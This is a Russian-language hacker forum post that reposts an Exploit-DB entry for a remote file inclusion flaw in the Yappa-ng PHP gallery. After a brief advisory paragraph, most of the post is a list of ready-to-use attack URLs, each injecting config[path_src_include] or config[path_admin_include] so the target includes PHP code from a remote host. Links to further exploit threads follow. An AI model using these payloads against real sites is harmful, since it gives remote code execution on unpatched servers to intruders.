Exploit Yappa-ng 1.x/2.x - Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25532
Проверка EDB
  1. Пройдено
Автор
GULFTECH SECURITY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2005-04-24
Код: 
source: https://www.securityfocus.com/bid/13371/info

yappa-ng is prone to a remote file include vulnerability. This issue may let remote attackers include and execute malicious remote PHP scripts.

The vendor has not published any specific details about this vulnerability other than stating that it is addressed in the 2.3.2 security release of the software. 

http://www.example.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_overview.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_leftnavbar.inc.php?config[path_src_include]=http://www.example.com/&config[show_album_desc_prev]=yes
http://www.example.com/src/index_image.inc.php?config[path_src_include]=http://www.example.com/&config[show_comments]=1&config_album[show_comments]=1
http://www.example.com/src/image-gd.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/image.class.php?config[path_src_include]=http://www.example.com/&config[image_module]=blah
http://www.example.com/src/album.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/show_random.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/main.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.example.com/
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion
Ответы
0
Просмотры
363
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Yappa 3.1.2 - 'yappa.php' Multiple Remote Command Execution Vulnerabilities
Ответы
0
Просмотры
372
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Yappa-ng - Query String Cross-Site Scripting
Ответы
0
Просмотры
340
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Yappa-ng - 'index.php?album' Cross-Site Scripting
Ответы
0
Просмотры
339
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Yappa-ng 1.x/2.x - Cross-Site Scripting
Ответы
0
Просмотры
286
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Yappa-ng 2.3.3-beta0 - 'album' Local File Inclusion
Ответы
0
Просмотры
271
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
Ответы
1
Просмотры
1K
Эксплойты & Уязвимости
meselem
M
Exploiter
Exploit Webutler v3.2 - Remote Code Execution (RCE)
Ответы
0
Просмотры
613
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Ответы
0
Просмотры
596
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу